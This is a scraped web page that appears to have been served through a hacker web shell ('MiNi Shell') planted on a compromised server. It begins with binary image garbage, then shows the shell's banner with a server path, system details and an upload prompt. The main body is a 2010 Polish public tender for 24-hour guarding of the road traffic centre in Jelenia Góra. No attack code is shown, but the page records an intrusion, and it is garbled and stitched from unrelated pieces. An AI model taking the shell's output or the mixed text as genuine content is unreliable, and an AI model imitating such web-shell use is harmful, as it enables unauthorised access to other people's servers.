JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100126/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100126/22356-N-2010.html

<p class="kh_header"><b>Jelenia Góra: Ochrona mienia WORD i DSDiK w Jeleniej Górze ul. Rataja 9</b><br>
<b>Numer ogłoszenia: 22356 - 2010; data zamieszczenia: 26.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Ośrodek Ruchu Drogowego w Jeleniej Górze , ul. Rataja 9, 58-560 Jelenia Góra, woj. dolnośląskie, tel. (075) 64 32 260, faks (075) 64 32 268.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wordjg.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Ochrona mienia WORD i DSDiK w Jeleniej Górze ul. Rataja 9.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia  jest całodobowa ochrona fizyczna mienia WORD i DSDiK w Jeleniej Górze, ul. Rataja 9, składającego się z budynków i budowli wraz 
z wyposażeniem oraz środki transportowe i sprzętowe (wg aktualnej książki inwentarzowej) znajdujące się w ochranianych instytucjach. Wykonawca zobowiązuje się także do ochrony terenu i mienia przed działaniem osób, które zmierzają do naruszenia przepisów porządkowych, obowiązujących na tym terenie. Ochrona obejmuje działania zapobiegające przestępstwom i wykroczeniom przeciwko osobom, mieniu, przeciwdziałające powstawaniu szkody wynikającej z tych zdarzeń, działania nie dopuszczające do wstępu osób nieuprawnionych na teren chroniony oraz działania zapobiegające zniszczeniu mienia, a w szczególności:
-	sprawdzenie stanu wszelkich zamknięć, zabezpieczeń i plomb, w tym sprawdzenie prawidłowości zamknięcia drzwi i okien po opuszczeniu chronionego obiektu przez pracowników, sprawdzenie stanu ogrodzenia, bram wjazdowych i oświetlenia, sprawdzenie wyłączeń urządzeń wodno-kanalizacyjnych, sprawdzenie czy z pomieszczeń nie wydobywają się podejrzane zapachy typu swąd spalenizny, dym, itp. 
-	natychmiastowe zgłaszanie wszelkich braków lub naruszeń odnośnie stanu zabezpieczenia mienia na ochranianym obiekcie, do WORD lub DSDiK,  
w zależności, którego mienia dotyczy,
-	ciągła i aktywna służba pracowników ochrony na ochranianym obiekcie,
-	nadzorowanie (kontrolowanie) ruchu osobowego pracowników i petentów, zapewnienie spokoju i porządku na chronionym terenie,
-	ustalanie przez służbę ochrony uprawnień osób do przebywania na ochranianych obiektach oraz legitymowanie osób w celu ustalenia ich tożsamości,
-	wzywanie osób do opuszczenia obiektu w przypadku stwierdzenia braku uprawnień  do przebywania na terenie chronionego obiektu albo stwierdzenia zakłócenia porządku,
-	natychmiastowe powiadamianie Policji o pojawieniu się na terenie ochranianym osób stwarzających w sposób bezpośredni zagrożenie dla życia lub zdrowia, a także dla chronionego mienia,
-	natychmiastowe reagowanie, informowanie odpowiednich instytucji oraz WORD 
i DSDiK na sytuacje szczególnego zagrożenia takie jak: nadzwyczajne: wypadki  
i awarie, naturalne: powódź, wyładowania atmosferyczne, pożary, katastrofy, wywołane przez człowieka:  kradzież, dywersja, sabotaż, podłożenia bomby, zakłócenia porządku, wandalizm, niszczenie mienia.
W razie zauważenia awarii należy, w miarę możliwości, zabezpieczyć miejsce awarii, powiadomić odpowiednio osoby wskazane  do kontaktów ze strony WORD  
i DSDiK, a w razie zaistnienia potrzeby wezwać właściwe służby tj. pogotowie ratunkowe, energetyczne, straż pożarną itp. odnotowując zaistniałe zdarzenia  
i zauważone usterki w książce służby,
 	-    niedopuszczanie do przenikania osób nieuprawnionych do wstępu na teren posesji przy ulicy Rataja 9 w Jeleniej Górze, jak również do budynków tam się znajdujących,
-	podnoszenie zapory (bariery) na wjeździe na teren posesji przy ulicy Rataja 9
        w Jeleniej Górze dla uprawnionych pojazdów,
-	prowadzenie książki służby, w której należy odnotowywać m. in. datę i godzinę przyjęcia i zakończenia dyżuru (potwierdzone podpisami zdającego  
i przyjmującego służbę), przebieg służby,
-	czynności odczytu i wpisu do księgi stanu odpowiednio wskazań liczników energii elektrycznej, energii cieplnej i wody. Odczyty i wpisy dokonywane będą przy udziale przedstawicieli instytucji dostarczających ww. media w terminach,  
w których te instytucje przeprowadzają odczyt liczników.
Do obowiązków Wykonawcy należy umundurowanie i oznaczenie pracowników ochrony w sposób jednolity, umożliwiający ich identyfikację oraz identyfikację Wykonawcy.
 Wykonawca na czas trwania umowy zamontuje elektroniczny system wspomagania 
i kontroli patrolowania terenu polegający na odczytywaniu punktów kontrolnych w celu stwierdzenia faktu przebywania pracownika ochrony w  punkcie kontrolnym  
z zarejestrowaniem miejsca i czasu przebywania. Punkty kontrolne w ilości 3 zostaną umieszczone w miejscach wskazanych przez Zamawiającego. Obowiązkiem pracowników ochrony będzie patrolowanie terenu w porze nocnej tj. od godziny 20:00 do 6:00 z częstotliwością co dwie godziny i stosowne odnotowanie, poprzez system, miejsca i czasu pobytu.
Szczegółowy harmonogram patrolowania strony uzgodnią po zawarciu umowy.
Miesięczny raport z przeprowadzonych patroli Wykonawca, załącza do faktury za wykonaną usługę. 
System wraz z urządzeniami i oprogramowaniem jest własnością Wykonawcy, który po zakończeniu usługi zdemontuje urządzenia.
 Ochrona mienia będzie realizowana całodobowo (każdego dnia) na terenie nieruchomości  położonej w Jeleniej Górze, przy ulicy Rataja 9 należącej do:
-	WORD - budynki i niezabudowany teren.
-	DSDiK - budynek Laboratorium.
Wykonawca wyposaży swoich pracowników w telefony komórkowe i zapewni łączność telefoniczną  w szczególności z Zamawiającym i w zakresie połączeń alarmowych (pogotowie ratunkowe, straż pożarna, policja, straż miejska itp.). Przed przystąpieniem do realizacji umowy Wykonawca przedłoży Zamawiającemu stosowny pisemny wykaz numerów telefonów komórkowych, a także będzie z wyprzedzeniem pisemnie informował Zamawiającego o zmianach numerów telefonicznych. 
Wykonawca bierze na siebie odpowiedzialność za siedzibę i teren, na którym pełniona będzie ochrona wraz z całym wyposażeniem i środkami transportu oraz  sprzętem.
Do wykonania zamówienia Wykonawca zapewnia sprzęt i środki, które muszą spełniać wymagania co do standardu i jakości określone w Polskich Normach oraz być dopuszczone do użytku na podstawie odpowiednich atestów. 
Cena ofertowa za wykonanie zamówienia musi zawierać wszystkie koszty konieczne do poniesienia przez Wykonawcę w celu wykonania usług zgodnie z zakresem i warunkami określonymi w nn. opisie przedmiotu zamówienia, a w szczególności ujmować koszty zaopatrzenia, wyposażenia w materiały, sprzęt, koszty transportowe, jak również koszty umundurowania i oznakowania pracowników ochrony.
Wykonawca zobowiązuje się, że w terminie do dnia 25 każdego miesiąca, będzie przedkładał  w WORD, pisemny harmonogram dozoru na następny miesiąc, zawierający 
m. in. imienny wykaz pracowników, którzy z ramienia Wykonawcy będą sprawować czynności dozoru na rzecz Zamawiającego godziny pracy poszczególnych pracowników..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wymagane wadium 2 000zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia ubiegać się mogą Wykonawcy składający ważną  
    i odpowiednią ofertę oraz:
a) posiadający uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
b) posiadający niezbędną wiedzę i doświadczenie oraz dysponujący potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
c) znajdujący się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, 
d) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ustawy PZP,
a ponadto:
e) posiadają koncesję na prowadzenie działalności gospodarczej w zakresie ochrony osób 
    i mienia, 
	f)   w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali -  min. 2 usługi w zakresie ochrony mienia o wartości min. 72 000,00 zł brutto 
	g) 	wykonali/wykonują w/w usługi należycie, 
h) zapewnią do realizacji przedmiotu zamówienia pracowników nie karanych, 
i) posiadają co najmniej:
-  min. 1 pracownika posiadającego licencje pracownika ochrony  II-ego stopnia, pełniącego nadzór, 
- co najmniej 1 pracownika nie przekraczającego 50 roku życia, oraz cechować się dobrymi warunkami fizycznymi i wysoką kulturą osobistą. 
	j)	są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę  min. 200 000,00 zł.
 Zgodnie z art. 26 ust. 2 Ustawy PZP załączą dokumenty wymienione w § 1 ust. 1 pkt. 1, 2, 3, 4, 5  ust. 2 pkt. 2, 5, 6  oraz ust. 3 pkt. 3 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane. ( Dz.U. Nr 87 z dnia 24 maja 2006r. poz. 605).
Wykonawca winien oświadczyć, że spełnia warunki określone w art. 22 PZP oraz, że nie podlega wykluczeniu z postępowania na podstawie art. 24 PZP,
Sprawdzenie w/w warunków udziału w postępowaniu odbywać się będzie na podstawie 
    przedłożonych przez Wykonawcę dokumentów i oświadczeń wg zasady  spełnia / nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawca winien oświadczyć, że spełnia warunki określone w art. 22 PZP oraz, że nie podlega wykluczeniu z postępowania na podstawie art. 24 PZP, podpisane oświadczenie. 
Wypełniony i podpisany formularz oferty wg ZAŁĄCZNIKA NR 1 do SIWZ.
Wypełnione arkusze kalkulacyjne załączniki do SIWZ
koncesja na działalność gospodarczą w zakresie ochrony osób i mienia;
aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
aktualna informacja z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt 4-8 PZP, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 PZP, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, 
że wykonawca nie zalega z opłacaniem podatków, opłat, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji organu podatkowego - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert; 
aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji organu podatkowego - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert; 
wykaz wykonanych/wykonywanych usług w zakresie ochrony mienia WG ZAŁĄCZNIKA DO SIWZ.
dokumenty potwierdzające, że usługi zostały wykonane należycie,
wykaz kadry wraz z dokumentami potwierdzającymi posiadanie niezbędnych uprawnień;
Zaakceptowany projekt umowy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.wordjg.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Ośrodek Ruchu Drogowego
ul. Rataja 9
58-560 Jelenia Góra.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.02.2010 godzina 10:30, miejsce: Wojewódzki Ośrodek Ruchu Drogowego
ul. Rataja 9
58-560 Jelenia Góra.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com